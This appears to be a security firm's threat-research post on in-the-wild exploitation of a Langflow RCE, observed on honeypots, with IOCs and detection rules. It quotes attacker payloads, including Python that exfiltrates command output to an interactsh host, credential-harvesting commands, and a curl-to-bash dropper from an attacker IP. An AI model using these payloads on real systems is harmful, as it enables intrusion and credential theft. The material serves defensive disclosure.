






















On March 17, 2026, a critical vulnerability was disclosed in Langflow, the open-source visual framework for building AI agents and Retrieval-Augmented Generation (RAG) pipelines. The vulnerability, CVE-2026-33017, is an unauthenticated remote code execution (RCE) in the public flow build endpoint that allows attackers to execute arbitrary Python code on any exposed Langflow instance, with no credentials required and only a single HTTP request to get moving.
Within 20 hours of the advisory’s publication, the Sysdig Threat Research Team (TRT) observed the first exploitation attempts in the wild. No public proof-of-concept (PoC) code existed at the time. Attackers built working exploits directly from the advisory description and began scanning the internet for vulnerable instances. Exfiltrated information included keys and credentials, which provided access to connected databases and potential software supply chain compromise.
Within hours of the advisory, the Sysdig TRT deployed a fleet of honeypot nodes with vulnerable Langflow instances across multiple cloud providers and regions. What followed was a textbook demonstration of how quickly modern threat actors are operationalizing new vulnerabilities. Our findings are detailed below.
|
Time (UTC) |
Event |
|
Mar 17, 20:05 |
Advisory GHSA-vwmf-pq79-vjvx published on GitHub |
|
Mar 18, 16:04 |
First exploitation attempt observed (from 77.110.106.154) |
|
Mar 18, 16:05 |
Second attacker (209.97.165.247) begins probing |
|
Mar 18, 16:39 |
Sustained scanning begins across multiple nodes |
|
Mar 18, 20:55 |
First advanced attacker progresses to environment variable exfiltration |
The gap between advisory publication and first exploitation was approximately 20 hours. This is notable because no public PoC repository existed on GitHub at the time of the first attack. The advisory itself contained enough detail (the vulnerable endpoint path and the mechanism for code injection via flow node definitions) for attackers to construct a working exploit without additional research.
Langflow is a popular open-source platform (145,000+ GitHub stars). It enables users to build AI workflows using a visual drag-and-drop interface. Langflow provides a REST API that allows programmatic interaction with flows, including building and executing them.
CVE-2026-33017 affects the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint, which is designed to allow unauthenticated users to build public flows. The vulnerability arises because this endpoint accepts attacker-supplied flow data containing arbitrary Python code in node definitions, which is then executed server-side without sandboxing. This is distinct from CVE-2025-3248, an earlier Langflow RCE added to CISA's Known Exploited Vulnerabilities catalog in May 2025. CVE-2026-33017 has not yet been added to the KEV despite confirmed active exploitation.
Over the course of 48 hours following the advisory publication, we recorded CVE-2026-33017 exploit events from 6 unique source IPs across our honeypot fleet.
The earliest attempts at exploitation came from automated scanning infrastructure. Four source IPs arrived within minutes of each other, all sending an identical payload. These likely represent a single operator scanning through multiple proxies or VPS nodes rather than four independent attackers:
_r = __import__('os').popen('id').read()
_enc = __import__('base64').b64encode(_r.encode()).decode()
__import__('urllib.request').request.urlopen('http://<unique-subdomain>.oast.*//' + _enc)The payload executes id, base64-encodes the output, and exfiltrates it to an interactsh callback server. Each request uses a unique interactsh subdomain, but the code template is identical across all IPs.
16:04:57 UTC — 77.110.106.154 → id → d6tcpc6fl...oast.* callback
16:05:23 UTC — 209.97.165.247 → id → d6tcpcjhc...oast.* callback
16:08:41 UTC — 188.166.209.86 → id → d6tcpe7ns...oast.* callback
16:39:32 UTC — 205.237.106.117 → id → d6td5s9qt...oast.* callbackThe requests explicitly identify themselves as nuclei. Every exploit request includes Cookie: client_id=nuclei-scanner in the headers, and a preceding flow creation request names the flow nuclei-cve-2026-33017:
Cookie: client_id=nuclei-scanner{"name": "nuclei-cve-2026-33017", "data": {"nodes": [], "edges": []}}The named exploit requests, in addition to other characteristics, suggest nuclei as the scanning tool:
Knoppix; Linux i686 and Fedora; Linux i686. These appear in nuclei's random User-Agent wordlist and are not sent by any real browser.{{interactsh-url}} placeholder.At the time of this writing, no CVE-2026-33017 template exists in the official nuclei-templates repository. Therefore, what we identified is likely a privately authored template, written and deployed at scale within hours of disclosure. Whether the template author is the same person operating the scans or distributing the template to others is unclear from this data alone.
In contrast to the nuclei scans, a second class of attacker appeared using custom Python scripts (python-requests/2.32.3, consistent across all requests, no UA rotation). These operators moved beyond validation into active reconnaissance. One attacker (83.98.164.238) progressed through a methodical kill chain:
ls -al /root; ls /app; cat /etc/passwdid (returned uid=1000(langflow))bash -c "$(curl -fsSL http://173.212.205.251:8443/z)"The stage-2 dropper URL (http://173.212.205.251:8443/z) indicates the attacker had pre-staged infrastructure ready to deploy once they confirmed a vulnerable target. This is not ad-hoc testing. This is an attacker with a prepared exploitation toolkit moving from vulnerability validation to payload deployment in a single session.
The most advanced activity came from IP 173.212.205.251, which conducted a thorough credential harvesting operation:
env to capture the full process environment, which in a typical Langflow deployment includes database connection strings, API keys, and cloud credentials.find /app -name "*.db" -o -name "*.env" to locate configuration files and databases..env files containing application secrets.Two of the source IPs running custom exploit scripts (83.98.164.238 and 173.212.205.251) both exfiltrated data to the same command-and-control server at 143.110.183.86:8080. The stage-2 dropper was also hosted on 173.212.205.251:8443. This overlap likely indicates a single operator working through multiple proxies or VPS nodes, though it could also reflect a shared exploitation toolkit.
The 20-hour window between advisory publication and first exploitation is consistent with an accelerating trend that the Zero Day Clock project has been tracking across 83,000+ CVEs. The data shows the median time-to-exploit (TTE) has collapsed from 771 days in 2018 to just hours in 2024. By 2023, 44% of exploited vulnerabilities were weaponized within 24 hours of disclosure, and 80% of public exploits appeared before the official advisory was even published. Our observation of CVE-2026-33017 fits squarely in this trend: working exploits appeared within a day, built from nothing more than the advisory text.
This timeline compression poses serious challenges for defenders. The median time for organizations to deploy patches is approximately 20 days, meaning defenders are exposed and vulnerable for far too long. Threat actors are monitoring the same advisory feeds that defenders use, and they are building exploits faster than most organizations can assess, test, and deploy patches. Organizations must completely reconsider their vulnerability programs to meet reality.
Furthermore, several factors likely made CVE-2026-33017 particularly attractive to attackers:
When the patch window collapses to hours, runtime detection becomes the primary line of defense. The exploitation patterns observed in this campaign produce clear signals at the system call level that tools like Falco and Sysdig Secure are designed to catch, without any prior knowledge of the specific CVE.
Every attacker in this campaign followed the same post-exploitation playbook: execute a shell command via Python's os.popen(), then exfiltrate the output over HTTP. Each stage of this kill chain maps to existing Falco rules provided out of the box that ship with Sysdig Secure:
|
Attack Stage |
Observed Behavior |
Sysdig Rule |
|
Credential theft |
Reading /etc/passwd, /etc/shadow, .env |
Read sensitive file untrusted |
|
OOB validation |
DNS lookup to .oast.live, .oastify.com |
DNS Lookup for Offensive Security Tool Domain Detected |
|
Stage-2 delivery |
curl -fsSL http://attacker/z \| sh |
Inline Shell Execution by Wget/Curl |
|
C2 exfiltration |
Outbound connection to 143.110.183.86:8080 |
Outbound Connection to C2 Servers |
The key advantage of runtime detection in this context is that it works on day zero. These rules do not require a signature for CVE-2026-33017 specifically because they detect the exploitation behavior, not the vulnerability. The same rules would fire regardless of whether the initial access came through CVE-2026-33017, CVE-2025-3248, or any other RCE in an application.
|
IP |
Location |
ASN |
Activity |
|
77.110.106.154 |
DE (Frankfurt) |
AEZA GROUP LLC |
Nuclei scan, interactsh callback |
|
209.97.165.247 |
SG (Singapore) |
DigitalOcean |
Nuclei scan, interactsh callback |
|
188.166.209.86 |
SG (Singapore) |
DigitalOcean |
Nuclei scan, interactsh callback |
|
205.237.106.117 |
FR (Paris) |
PUSHPKT OU |
Nuclei scan, interactsh callback |
|
83.98.164.238 |
NL (Lelystad) |
Accenture B.V. |
Custom exploit, recon, stage-2 dropper delivery |
|
173.212.205.251 |
FR (Lauterbourg) |
Contabo GmbH |
Custom exploit, env/credential harvesting, dropper host |
|
Indicator |
Type |
Location |
Context |
|
143.110.183.86:8080 |
C2 server |
IN, DigitalOcean |
Receives base64-encoded exfiltration |
|
173.212.205.251:8443 |
Dropper host |
FR, Contabo GmbH |
Serves stage-2 payload at /z |
http://143.110.183.86:8080/
http://173.212.205.251:8443/zTwelve unique interactsh subdomains were observed across the nuclei scanning activity, using .oast.live, .oast.me, .oast.pro, and .oast.fun TLDs. Below is one sample:
d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live
d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me
d6td5s9qte0bea7273e0wuou77jjx77uk.oast.pro
d6tgbe1qte0a8rkffb3gqabqm8517exd3.oast.funNote: Source IPs may be proxies or VPS nodes rather than the operator's true origin. The interactsh subdomains are ephemeral and rotate per scan.
/api/v1/build_public_tmp endpoint or disable public flow building entirely.CVE-2026-33017, which served as sufficient documentation for threat actors to build working exploits, demonstrates a pattern that is becoming the norm rather than the exception: critical vulnerabilities in popular open-source tools are weaponized within hours of disclosure, often before public PoC code is even available. Furthermore, AI workloads are increasingly falling into threat actors’ crosshairs as they offer high-value data, software supply chain access, and often lack robust security. As Zero Day Clock makes clear, this is not an outlier. The collapse from months-long exploitation timelines to same-day weaponization is a structural shift in how vulnerabilities are exploited today.
For defenders, the practical takeaway is that the window between "advisory publication" and "active exploitation" is now measured in hours, not days or weeks. Organizations that rely on scheduled patch cycles to address critical vulnerabilities are operating on a timeline that attackers have already outpaced. Runtime detection, network segmentation, and rapid response capabilities are essential to bridging the gap between disclosure and remediation.
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。